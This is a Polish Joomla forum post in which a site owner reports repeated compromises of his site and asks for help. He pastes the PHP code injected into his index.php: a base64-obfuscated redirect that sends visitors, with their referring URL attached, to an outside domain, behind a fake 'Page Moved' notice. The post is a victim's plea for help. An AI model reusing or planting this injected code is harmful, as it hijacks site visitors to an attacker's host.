Włamania na stronę
Wyniki 1 do 10 z 15

Temat: Włamania na stronę

Widok drzewa

Poprzednia wiadomość Poprzednia wiadomość   Następna wiadomość Następna wiadomość
  1. #1
    Przeglądacz
    Dołączył
    16-07-2010
    Skąd
    Łódź
    Wpisy
    59
    Punkty
    10

    Włamania na stronę

    Witam
    Od dwóch tygodni ktoś włamuje się bezczelnie na moja stronę !!!
    Ja przywracam pliki z serwera z kopii, mijają 4h i znowu to samo. Podejrzewam, iż dzieje się to przez SQL, ale pewności nie mam. Adres strony - http://www.akces.eu, Wersja Joomla 1.5.22 czyli najbardziej aktualna. Zgłosiłem to na policję, ale znając życie to i tak z tym nic nie zrobią ;/ Jak zlokalizować takiego kogoś, lub ewentualnie jakoś dobrze zablokować, aby już tego nie robił. Bardzo mnie to drażni. Po dokonanym włamaniu na stronie widnieje komunikat o treści : Parse error: syntax error, unexpected '<' in /index.php on line 88.
    Bardzo proszę forumowiczów o pomoc. Dodam, że pliki mają odpowiednie prawa tak jak jest to opisane w helpie Joomli .
    Proszę o ewentualne podpowiedzi jak dorwać tego kogoś, zlokalizować lub zablokować ?

    Dodam, że w kodzie index.php pojawia się cos takiego jak poniżej:

    echo JResponse::toString($mainframe->getCfg('gzip'));<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('a2hjb2wuY29t');$tf['u']='http://'.$tf['s'].'/page/';$tf['r']="?ref=".base64_encode('http://'.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']);if(!isset($_GET['rf'])){if(!@headers_sent()){@header("HTTP/1.1 302 Moved Temporarily");@header("Location: ".$tf['u'].$tf['r']);}echo "<h3>Page Moved</h3>The page you are trying to open has been moved.<br><br>Use the navigation links on the right of this page, the search box at the top, or the site map link below to find the new location of the page you're seeking.<br><br>Click the link below to follow new url.<br><br><a href=\"".$tf['u']."\">".$tf['u']."</a>";echo "<script type=\"text/javascript\">document.location = \"".$tf['u'].$tf['r']."\";</script>";exit;}

    Bardzo proszę o pomoc .
    Ostanio edytowane przez piotrusbor : 04-04-2011 10:54

Podobne tematy

  1. Przekłamania w liczniku odwiedzin
    przez gti na forum Administracja składnikami
    Odpowiedzi: 3
    Ostatni post/autor: 09-11-2008, 21:05
  2. Włamania do joomla...
    przez Riaan na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 1
    Ostatni post/autor: 10-06-2008, 20:19
  3. Brak łamania wiersza w edytorze.
    przez foruser na forum Joomla 1.5 BŁĘDY
    Odpowiedzi: 12
    Ostatni post/autor: 02-04-2008, 16:56
  4. Włamania do for
    przez Puerto na forum Off topic
    Odpowiedzi: 5
    Ostatni post/autor: 27-03-2008, 23:10
  5. MOSimage: wymuszenie złamania wiersza podpisu?
    przez brzoza na forum Administracja Joomla!
    Odpowiedzi: 2
    Ostatni post/autor: 19-09-2007, 00:34

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •